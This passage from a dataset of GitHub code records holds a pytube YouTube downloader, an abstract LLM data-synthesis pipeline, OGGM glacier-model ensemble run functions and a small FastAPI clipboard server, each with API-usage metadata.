{"api_name": "typing.Optional", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 49, "usage_type": "name"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 65, "usage_type": "call"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 75, "usage_type": "call"}, {"api_name": "models.swepub.affiliation.SwepubAffiliation", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "37660039185", "text": "#!/usr/bin/env python3\nimport math\nimport os\nimport sys\n\nimport yaml\nfrom colorama import Fore\nfrom pytube import YouTube\n\n\nSCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\nCONFIG_FILE = os.path.join(SCRIPT_DIR, \"mytube_config.yml\")\n\n\ndef main():\n try:\n # Read in the config\n with open(CONFIG_FILE, \"r\") as infile:\n config = yaml.safe_load(infile)\n\n for item in config:\n if \"video\" in item:\n handle_video(item)\n elif \"collection\" in item:\n handle_collection(item)\n else:\n raise ValueError(f\"Unknown entry in mytube_config.yaml: {item}\")\n\n except Exception as e:\n print(e)\n sys.exit(1)\n\n\ndef handle_video(video_config: dict):\n download_video(\n url=video_config[\"url\"],\n directory=os.path.expanduser(video_config[\"dir\"]),\n name=video_config.get(\"name\"),\n )\n\n\ndef handle_collection(collection_config: dict):\n for video in collection_config[\"videos\"]:\n download_video(\n url=video[\"url\"],\n directory=os.path.expanduser(collection_config[\"dir\"]),\n name=video.get(\"name\"),\n )\n\n\ndef download_video(url: str, directory: str, name: str = None):\n file_extension = \"mp4\"\n video = None\n stream = None\n if name:\n file_path = f\"{os.path.join(directory, name)}.{file_extension}\"\n else:\n # Use highest resolution mp4 stream\n video = YouTube(url)\n stream = video.streams.filter(\n file_extension=file_extension\n ).get_highest_resolution()\n file_path = os.path.join(directory, stream.default_filename)\n\n # Check if the video file already exists.\n if os.path.exists(file_path):\n print(Fore.GREEN + f\"{file_path} already exists! 
Skipping...\" + Fore.RESET)\n return\n\n # If stream hasn't already been fetched, get it now\n video = video or YouTube(url)\n stream = (\n stream\n or video.streams.filter(file_extension=file_extension).get_highest_resolution()\n )\n\n # Register progress callbacks\n pc = ProgressCheck(file_path=file_path, file_size=stream.filesize)\n video.register_on_progress_callback(pc.on_progress)\n video.register_on_complete_callback(pc.on_complete)\n\n stream.download(\n output_path=directory,\n filename=name,\n skip_existing=False,\n )\n\n\nclass ProgressCheck:\n def __init__(self, file_path, file_size):\n self.file_path = file_path\n self.file_size = file_size\n self.percent_complete = 0\n\n print(Fore.YELLOW + f\"{self.file_path} - beginning download...\" + Fore.RESET)\n\n def on_progress(self, stream, chunk, bytes_remaining):\n # Gets the percentage of the file that has been downloaded.\n new_percent_complete = math.floor(\n (100 * (self.file_size - bytes_remaining)) / self.file_size\n )\n if new_percent_complete == self.percent_complete:\n return\n\n if new_percent_complete in (10, 20, 30, 40, 50, 60, 70, 80, 90):\n print(f\"{self.file_path} - {new_percent_complete:00.0f}% downloaded\")\n\n self.percent_complete = new_percent_complete\n\n def on_complete(self, stream, file_path):\n print(Fore.GREEN + f\"{self.file_path} - finished downloading!\" + Fore.RESET)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "zjrubin/mytube", "sub_path": "mytube.py", "file_name": "mytube.py", "file_ext": "py", "file_size_in_byte": 3361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pytube.YouTube", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "colorama.Fore.GREEN", "line_number": 67, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 67, "usage_type": "name"}, {"api_name": "colorama.Fore.RESET", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pytube.YouTube", "line_number": 71, "usage_type": "call"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 95, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 95, "usage_type": "name"}, {"api_name": "colorama.Fore.RESET", "line_number": 95, "usage_type": "attribute"}, {"api_name": "math.floor", 
"line_number": 99, "usage_type": "call"}, {"api_name": "colorama.Fore.GREEN", "line_number": 111, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 111, "usage_type": "name"}, {"api_name": "colorama.Fore.RESET", "line_number": 111, "usage_type": "attribute"}]} +{"seq_id": "35630880787", "text": "from abc import ABC, abstractmethod\nimport os\nfrom typing import List, Dict\n\nfrom helpers.json_utils import load_jsonl_into, write_jsonl\nfrom helpers.openai import OpenAICompletionProvider\n\n\nclass SynthStage(ABC):\n llm_provider: OpenAICompletionProvider\n\n def __init__(\n self,\n input_path_template: str,\n output_path_template: str,\n ):\n base_dir = \"outputs/\"\n self.input_path_template = base_dir + input_path_template\n self.output_path_template = base_dir + output_path_template\n\n def read_inputs(self, run_id: str) -> List[Dict]:\n \"\"\"Read inputs and return a list of dictionaries.\"\"\"\n data = []\n input_path = self.input_path_template.format(ID=run_id) + \".jsonl\"\n if os.path.exists(input_path):\n load_jsonl_into(input_path, data)\n else:\n raise FileNotFoundError(f\"File with name {input_path} does not exist!\")\n return data\n\n @abstractmethod\n def clean_inputs(self, data: List[Dict], run_id: str) -> List[Dict]:\n \"\"\"Clean the input data.\"\"\"\n pass\n\n @abstractmethod\n def call_llm(self, data: List[Dict], run_id: str) -> List[Dict]:\n \"\"\"Call the model.\"\"\"\n pass\n\n @abstractmethod\n def clean_outputs(self, data: List[Dict], run_id: str) -> List[Dict]:\n \"\"\"Clean the output data.\"\"\"\n pass\n\n def save_outputs(self, data: List[Dict], run_id: str) -> None:\n \"\"\"Save the outputs.\"\"\"\n results = []\n out_path = self.output_path_template.format(ID=run_id) + \".jsonl\"\n if os.path.exists(out_path):\n load_jsonl_into(out_path, results)\n for entry in data:\n results.append(entry)\n write_jsonl(out_path, results)\n return\n\n def run(self, run_id: str) -> None:\n \"\"\"Run the entire stage pipeline.\"\"\"\n data = self.read_inputs(run_id)\n data = self.clean_inputs(data, run_id)\n data = self.call_llm(data, run_id)\n data = self.clean_outputs(data, run_id)\n self.save_outputs(data, run_id)\n\n\nclass SynthPipeline:\n def __init__(\n self, model: str = \"gpt-3.5-turbo-0613\", temperature: float = 1.0\n ) -> None:\n self.model = model\n self.temperature = temperature\n self.stages = []\n\n def add_stage(self, stage: SynthStage) -> \"SynthPipeline\":\n \"\"\"Add a stage to the pipeline.\"\"\"\n stage.llm_provider = OpenAICompletionProvider(self.model, self.temperature)\n self.stages.append(stage)\n return self\n\n def run(self, id) -> None:\n \"\"\"Run all stages in the pipeline.\"\"\"\n for stage in self.stages:\n stage.run(id)\n", "repo_name": "yifever/data_synthesizer", "sub_path": "pipeline/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 2665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABC", "line_number": 9, "usage_type": "name"}, {"api_name": "helpers.openai.OpenAICompletionProvider", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "helpers.json_utils.load_jsonl_into", "line_number": 26, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 21, "usage_type": "name"}, {"api_name": 
"typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 32, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 37, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "helpers.json_utils.load_jsonl_into", "line_number": 51, "usage_type": "call"}, {"api_name": "helpers.json_utils.write_jsonl", "line_number": 54, "usage_type": "call"}, {"api_name": "helpers.openai.OpenAICompletionProvider", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "1539477829", "text": "import numpy as np\nimport xarray as xr\nimport logging\nimport itertools\nimport ast\nimport os\nimport shutil\n\nfrom oggm import tasks, cfg\nfrom oggm.core.flowline import (FileModel, run_from_climate_data)\nfrom oggm.workflow import execute_entity_task, merge_glacier_tasks\nfrom oggm.core.climate import compute_ref_t_stars\nfrom oggm.core.massbalance import (MultipleFlowlineMassBalance,\n ConstantMassBalance)\nfrom oggm import GlacierDirectory\nfrom oggm.utils import copy_to_basedir, mkdir\n\nfrom relic.spinup import systematic_spinup, minimize_dl\nfrom relic.preprocessing import merge_pair_dict\nfrom relic.postprocessing import relative_length_change\n\nfrom relic import preprocessing\n\n# Module logger\nlog = logging.getLogger(__name__)\n\n\ndef spinup_plus_histalp(gdir, meta=None, mb_bias=None, runsuffix=''):\n # take care of merged glaciers\n rgi_id = gdir.rgi_id.split('_')[0]\n\n # select meta\n meta = meta.loc[rgi_id].copy()\n # we want to simulate as much as possible -> histalp till 2014\n obs_ye = 2014\n\n # --------- SPIN IT UP ---------------\n tbias = systematic_spinup(gdir, meta, mb_bias=mb_bias)\n\n if tbias == -999:\n\n rval = {'rgi_id': gdir.rgi_id, 'name': meta['name'],\n 'histalp': np.nan,\n 'spinup': np.nan,\n 'tbias': np.nan, 'tmean': np.nan, 'pmean': np.nan}\n return rval\n # --------- GET SPINUP STATE ---------------\n tmp_mod = FileModel(gdir.get_filepath('model_run',\n filesuffix='_spinup'))\n tmp_mod.run_until(tmp_mod.last_yr)\n\n # --------- HIST IT DOWN --------------\n try:\n run_from_climate_data(gdir, ys=meta['first'], ye=obs_ye,\n init_model_fls=tmp_mod.fls,\n climate_filename='climate_monthly',\n output_filesuffix='_histalp' + runsuffix,\n bias=mb_bias)\n except RuntimeError as err:\n if 'Glacier exceeds domain boundaries' in err.args[0]:\n log.info('(%s) histalp run exceeded domain bounds' % gdir.rgi_id)\n return\n else:\n raise RuntimeError('other error')\n\n ds1 = xr.open_dataset(gdir.get_filepath('model_diagnostics',\n filesuffix='_histalp' + runsuffix))\n ds2 = xr.open_dataset(gdir.get_filepath('model_diagnostics',\n filesuffix='_spinup'))\n # store mean temperature and precipitation\n yindex = np.arange(meta['first'], obs_ye+1)\n\n try:\n cm = xr.open_dataset(gdir.get_filepath('climate_monthly'))\n except FileNotFoundError:\n cm = 
xr.open_dataset(gdir.get_filepath('climate_monthly',\n filesuffix='_' + rgi_id))\n\n tmean = cm.temp.groupby('time.year').mean().loc[yindex].to_pandas()\n pmean = cm.prcp.groupby('time.year').mean().loc[yindex].to_pandas()\n\n rval = {'rgi_id': gdir.rgi_id, 'name': meta['name'],\n 'histalp': ds1.length_m.to_dataframe()['length_m'],\n 'spinup': ds2.length_m.to_dataframe()['length_m'],\n 'tbias': tbias, 'tmean': tmean, 'pmean': pmean}\n\n # relative length change\n rval['rel_dl'] = relative_length_change(meta, rval['spinup'],\n rval['histalp'])\n\n # if merged, store tributary flowline change as well\n if '_merged' in gdir.rgi_id:\n\n trib = rval['histalp'].copy() * np.nan\n\n # choose the correct flowline index, use model_fls as they have rgiids\n fls = gdir.read_pickle('model_flowlines')\n flix = np.where([fl.rgi_id != rgi_id for fl in fls])[0][-1]\n\n fmod = FileModel(gdir.get_filepath('model_run',\n filesuffix='_histalp' + runsuffix))\n assert fmod.fls[flix].nx == fls[flix].nx, ('filemodel and gdir '\n 'flowlines do not match')\n for yr in rval['histalp'].index:\n fmod.run_until(yr)\n trib.loc[yr] = fmod.fls[flix].length_m\n\n trib -= trib.iloc[0]\n rval['trib_dl'] = trib\n\n return rval\n\n\ndef multi_parameter_run(paramdict, gdirs, meta, obs, runid=None, runsuffix=''):\n # get us all parameters\n keys = paramdict.keys()\n values = paramdict.values()\n paramcombi = [dict(zip(keys, combination)) for\n combination in itertools.product(*values)]\n log.info('Multi parameter run with >>> %s <<< parameters started.' %\n len(paramcombi))\n\n # default glena\n default_glena = 2.4e-24\n\n # if a runid is passed, run only this item in the paramcombi\n # runids (= SLURM JOBID) start at 1 !\n if runid is not None:\n paramcombi = [paramcombi[runid-1]]\n\n # rval_dict is our output\n rval_dict = {}\n # TODO think of something nicer! NetCDF or a like\n\n # loop over all combinations\n for nr, combi in enumerate(paramcombi):\n\n # set all parameters\n for key, val in combi.items():\n\n # here we set cfg.PARAMS values\n if key == 'glena_factor':\n cfg.PARAMS['glen_a'] = val * default_glena\n cfg.PARAMS['inversion_glen_a'] = val * default_glena\n # set mass balance bias\n elif key == 'mbbias':\n mbbias = val\n elif key == 'prcp_scaling_factor':\n cfg.PARAMS['prcp_scaling_factor'] = val\n else:\n raise ValueError('Parameter not understood')\n\n if runid is not None:\n nr = runid-1\n\n log.info('Current parameter combination: %s' % str(combi))\n log.info('This is combination %d out of %d.' 
% (nr+1, len(paramcombi)))\n\n # ok, we need the ref_glaciers here for calibration\n # they should be initialized, so just recreate them from the directory\n ref_gdirs = [GlacierDirectory(refid) for\n refid in preprocessing.ADDITIONAL_REFERENCE_GLACIERS]\n\n # do the mass balance calibration\n compute_ref_t_stars(ref_gdirs + gdirs)\n task_list = [tasks.local_t_star,\n tasks.mu_star_calibration,\n tasks.prepare_for_inversion,\n tasks.mass_conservation_inversion,\n tasks.filter_inversion_output,\n tasks.init_present_time_glacier\n ]\n for task in task_list:\n execute_entity_task(task, gdirs)\n\n # check for glaciers to merge:\n gdirs_merged = []\n gdirs2sim = gdirs.copy()\n for gid in meta.index:\n merg = merge_pair_dict(gid)\n if merg is not None:\n # main and tributary glacier\n gd2merge = [gd for gd in gdirs if gd.rgi_id in [gid] + merg[0]]\n\n # actual merge task\n log.warning('DeprecationWarning: If downloadlink is updated ' +\n 'to gdirs_v1.2, remove filename kwarg')\n gdir_merged = merge_glacier_tasks(gd2merge, gid,\n buffer=merg[1],\n filename='climate_monthly')\n\n # remove the entity glaciers from the simulation list\n gdirs2sim = [gd for gd in gdirs2sim if\n gd.rgi_id not in [gid] + merg[0]]\n\n # uncomment to visually inspect the merged glacier\n \"\"\"\n import matplotlib.pyplot as plt\n from oggm import graphics\n import os\n f, ax = plt.subplots(1, 1, figsize=(12, 12))\n graphics.plot_centerlines(gdir_merged,\n use_model_flowlines=True, ax=ax)\n f.savefig(os.path.join(cfg.PATHS['working_dir'], gid) + '.png')\n \"\"\"\n\n gdirs_merged.append(gdir_merged)\n\n # add merged glaciers to the left over entity glaciers\n gdirs2sim += gdirs_merged\n\n # do the actual simulations\n rval = execute_entity_task(spinup_plus_histalp,\n gdirs2sim, meta=meta,\n mb_bias=mbbias,\n runsuffix=runsuffix\n )\n # remove possible Nones\n rval = [rl for rl in rval if rl is not None]\n\n rval_dict[str(combi)] = rval\n\n return rval_dict\n\n\ndef run_ensemble(allgdirs, rgi_id, ensemble, tbiasdict, allmeta,\n storedir, runsuffix='', spinup_y0=1999):\n\n # default glena\n default_glena = 2.4e-24\n\n # loop over all combinations\n for nr, run in enumerate(ensemble):\n\n pdict = ast.literal_eval('{' + run + '}')\n cfg.PARAMS['glen_a'] = pdict['glena_factor'] * default_glena\n cfg.PARAMS['inversion_glen_a'] = pdict['glena_factor'] * default_glena\n mbbias = pdict['mbbias']\n cfg.PARAMS['prcp_scaling_factor'] = pdict['prcp_scaling_factor']\n\n log.info('Current parameter combination: %s' % str(run))\n log.info('This is combination %d out of %d.' 
% (nr+1, len(ensemble)))\n\n # ok, we need the ref_glaciers here for calibration\n # they should be initialized, so just recreate them from the directory\n ref_gdirs = [GlacierDirectory(refid) for\n refid in preprocessing.ADDITIONAL_REFERENCE_GLACIERS]\n\n # do the mass balance calibration\n compute_ref_t_stars(ref_gdirs + allgdirs)\n task_list = [tasks.local_t_star,\n tasks.mu_star_calibration,\n tasks.prepare_for_inversion,\n tasks.mass_conservation_inversion,\n tasks.filter_inversion_output,\n tasks.init_present_time_glacier\n ]\n\n for task in task_list:\n execute_entity_task(task, allgdirs)\n\n # check for glaciers to merge:\n gdirs_merged = []\n gdirs2sim = allgdirs.copy()\n for gid in allmeta.index:\n merg = merge_pair_dict(gid)\n if merg is not None:\n # main and tributary glacier\n gd2merge = [gd for gd in allgdirs if gd.rgi_id in [gid] + merg[0]]\n\n # actual merge task\n log.warning('DeprecationWarning: If downloadlink is updated ' +\n 'to gdirs_v1.2, remove filename kwarg')\n gdir_merged = merge_glacier_tasks(gd2merge, gid,\n buffer=merg[1],\n filename='climate_monthly')\n\n # remove the entity glaciers from the simulation list\n gdirs2sim = [gd for gd in gdirs2sim if\n gd.rgi_id not in [gid] + merg[0]]\n\n gdirs_merged.append(gdir_merged)\n\n # add merged glaciers to the left over entity glaciers\n gdirs2sim += gdirs_merged\n\n # now only select the one glacier\n gdir = [gd for gd in gdirs2sim if gd.rgi_id == rgi_id][0]\n rgi_id0 = rgi_id.split('_')[0]\n meta = allmeta.loc[rgi_id0].copy()\n\n # do the actual simulations\n\n # spinup\n fls = gdir.read_pickle('model_flowlines')\n tbias = tbiasdict[run]\n mb = MultipleFlowlineMassBalance(gdir, fls=fls,\n mb_model_class=ConstantMassBalance,\n filename='climate_monthly',\n y0=spinup_y0,\n bias=mbbias)\n minimize_dl(tbias, mb, fls, None, None, gdir, False,\n runsuffix='_{:02d}'.format(nr))\n\n # histalp\n # --------- GET SPINUP STATE ---------------\n tmp_mod = FileModel(\n gdir.get_filepath('model_run',\n filesuffix='_spinup_{:02d}'.format(nr)))\n\n tmp_mod.run_until(tmp_mod.last_yr)\n\n # --------- HIST IT DOWN ---------------\n histrunsuffix = '_histalp{}_{:02d}'.format(runsuffix, nr)\n\n # now actual simulation\n run_from_climate_data(gdir, ys=meta['first'], ye=2014,\n init_model_fls=tmp_mod.fls,\n output_filesuffix=histrunsuffix,\n climate_filename='climate_monthly',\n bias=mbbias)\n\n # save the calibration parameter to the climate info file\n out = gdir.get_climate_info()\n out['ensemble_calibration'] = pdict\n gdir.write_json(out, 'climate_info')\n\n # copy stuff to storage\n basedir = os.path.join(storedir, rgi_id)\n ensdir = os.path.join(basedir, '{:02d}'.format(nr))\n mkdir(ensdir, reset=True)\n\n deep_path = os.path.join(ensdir, rgi_id[:8], rgi_id[:11], rgi_id)\n\n # copy whole GDir\n copy_to_basedir(gdir, base_dir=ensdir, setup='run')\n\n # copy run results\n fn1 = 'model_diagnostics_spinup_{:02d}.nc'.format(nr)\n shutil.copyfile(\n gdir.get_filepath('model_diagnostics',\n filesuffix='_spinup_{:02d}'.format(nr)),\n os.path.join(deep_path, fn1))\n\n fn2 = 'model_diagnostics{}.nc'.format(histrunsuffix)\n shutil.copyfile(\n gdir.get_filepath('model_diagnostics', filesuffix=histrunsuffix),\n os.path.join(deep_path, fn2))\n\n fn3 = 'model_run_spinup_{:02d}.nc'.format(nr)\n shutil.copyfile(\n gdir.get_filepath('model_run',\n filesuffix='_spinup_{:02d}'.format(nr)),\n os.path.join(deep_path, fn3))\n\n fn4 = 'model_run{}.nc'.format(histrunsuffix)\n shutil.copyfile(\n gdir.get_filepath('model_run', filesuffix=histrunsuffix),\n 
os.path.join(deep_path, fn4))\n\n log.warning('DeprecationWarning: If downloadlink is updated to ' +\n 'gdirs_v1.2 remove this copyfile:')\n # copy (old) climate monthly files\n for fn in os.listdir(gdir.dir):\n if 'climate_monthly' in fn:\n shutil.copyfile(os.path.join(gdir.dir, fn),\n os.path.join(deep_path, fn))\n", "repo_name": "matthiasdusch/relic", "sub_path": "relic/histalp_runs.py", "file_name": "histalp_runs.py", "file_ext": "py", "file_size_in_byte": 14305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "relic.spinup.systematic_spinup", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 45, "usage_type": "attribute"}, {"api_name": "oggm.core.flowline.FileModel", "line_number": 48, "usage_type": "call"}, {"api_name": "oggm.core.flowline.run_from_climate_data", "line_number": 54, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 66, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 74, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 76, "usage_type": "call"}, {"api_name": "relic.postprocessing.relative_length_change", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 94, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 98, "usage_type": "call"}, {"api_name": "oggm.core.flowline.FileModel", "line_number": 100, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 119, "usage_type": "call"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 143, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 143, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 144, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 144, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 149, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 149, "usage_type": "name"}, {"api_name": "oggm.GlacierDirectory", "line_number": 161, "usage_type": "call"}, {"api_name": "relic.preprocessing.ADDITIONAL_REFERENCE_GLACIERS", "line_number": 162, "usage_type": "attribute"}, {"api_name": "relic.preprocessing", "line_number": 162, "usage_type": "name"}, {"api_name": "oggm.core.climate.compute_ref_t_stars", "line_number": 165, "usage_type": "call"}, {"api_name": "oggm.tasks.local_t_star", "line_number": 166, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 166, "usage_type": "name"}, {"api_name": "oggm.tasks.mu_star_calibration", "line_number": 167, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 167, "usage_type": "name"}, {"api_name": "oggm.tasks.prepare_for_inversion", "line_number": 168, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 168, "usage_type": "name"}, {"api_name": "oggm.tasks.mass_conservation_inversion", "line_number": 169, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 169, "usage_type": "name"}, {"api_name": "oggm.tasks.filter_inversion_output", "line_number": 170, "usage_type": "attribute"}, {"api_name": 
"oggm.tasks", "line_number": 170, "usage_type": "name"}, {"api_name": "oggm.tasks.init_present_time_glacier", "line_number": 171, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 171, "usage_type": "name"}, {"api_name": "oggm.workflow.execute_entity_task", "line_number": 174, "usage_type": "call"}, {"api_name": "relic.preprocessing.merge_pair_dict", "line_number": 180, "usage_type": "call"}, {"api_name": "oggm.workflow.merge_glacier_tasks", "line_number": 188, "usage_type": "call"}, {"api_name": "oggm.workflow.execute_entity_task", "line_number": 213, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 235, "usage_type": "call"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 236, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 236, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 237, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 237, "usage_type": "name"}, {"api_name": "oggm.cfg.PARAMS", "line_number": 239, "usage_type": "attribute"}, {"api_name": "oggm.cfg", "line_number": 239, "usage_type": "name"}, {"api_name": "oggm.GlacierDirectory", "line_number": 246, "usage_type": "call"}, {"api_name": "relic.preprocessing.ADDITIONAL_REFERENCE_GLACIERS", "line_number": 247, "usage_type": "attribute"}, {"api_name": "relic.preprocessing", "line_number": 247, "usage_type": "name"}, {"api_name": "oggm.core.climate.compute_ref_t_stars", "line_number": 250, "usage_type": "call"}, {"api_name": "oggm.tasks.local_t_star", "line_number": 251, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 251, "usage_type": "name"}, {"api_name": "oggm.tasks.mu_star_calibration", "line_number": 252, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 252, "usage_type": "name"}, {"api_name": "oggm.tasks.prepare_for_inversion", "line_number": 253, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 253, "usage_type": "name"}, {"api_name": "oggm.tasks.mass_conservation_inversion", "line_number": 254, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 254, "usage_type": "name"}, {"api_name": "oggm.tasks.filter_inversion_output", "line_number": 255, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 255, "usage_type": "name"}, {"api_name": "oggm.tasks.init_present_time_glacier", "line_number": 256, "usage_type": "attribute"}, {"api_name": "oggm.tasks", "line_number": 256, "usage_type": "name"}, {"api_name": "oggm.workflow.execute_entity_task", "line_number": 260, "usage_type": "call"}, {"api_name": "relic.preprocessing.merge_pair_dict", "line_number": 266, "usage_type": "call"}, {"api_name": "oggm.workflow.merge_glacier_tasks", "line_number": 274, "usage_type": "call"}, {"api_name": "oggm.core.massbalance.MultipleFlowlineMassBalance", "line_number": 297, "usage_type": "call"}, {"api_name": "oggm.core.massbalance.ConstantMassBalance", "line_number": 298, "usage_type": "name"}, {"api_name": "relic.spinup.minimize_dl", "line_number": 302, "usage_type": "call"}, {"api_name": "oggm.core.flowline.FileModel", "line_number": 307, "usage_type": "call"}, {"api_name": "oggm.core.flowline.run_from_climate_data", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path", "line_number": 330, "usage_type": "attribute"}, 
{"api_name": "oggm.utils.mkdir", "line_number": 331, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 333, "usage_type": "call"}, {"api_name": "os.path", "line_number": 333, "usage_type": "attribute"}, {"api_name": "oggm.utils.copy_to_basedir", "line_number": 336, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 343, "usage_type": "call"}, {"api_name": "os.path", "line_number": 343, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 354, "usage_type": "call"}, {"api_name": "os.path", "line_number": 354, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 364, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path", "line_number": 366, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 367, "usage_type": "call"}, {"api_name": "os.path", "line_number": 367, "usage_type": "attribute"}]} +{"seq_id": "74018424513", "text": "from typing import Union\nfrom fastapi import FastAPI, Form\nimport os\n\napp = FastAPI()\n\n@app.get(\"/clipboard\")\ndef get_clipboard():\n\tcontent = \"\"\n\twith open('clipboard.txt',encoding='utf8') as f:\n\t\tcontent = f.read()\n\t\tf.close\n\tprint(\"from get_clipboard method():\")\n\tprint(content)\n\treturn content\n\n@app.post(\"/clipboard\")\nasync def set_clipboard(content: str = Form()):\n\tprint(\"server rev a post request\")\n\twith open(\"clipboard.txt\",\"w\",encoding='utf8') as f:\n\t\tf.write(content)\n\t\tf.close\n\treturn content\n", "repo_name": "lemonhall/clipboard", "sub_path": "server/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 505, "program_lang": "python", "lang": 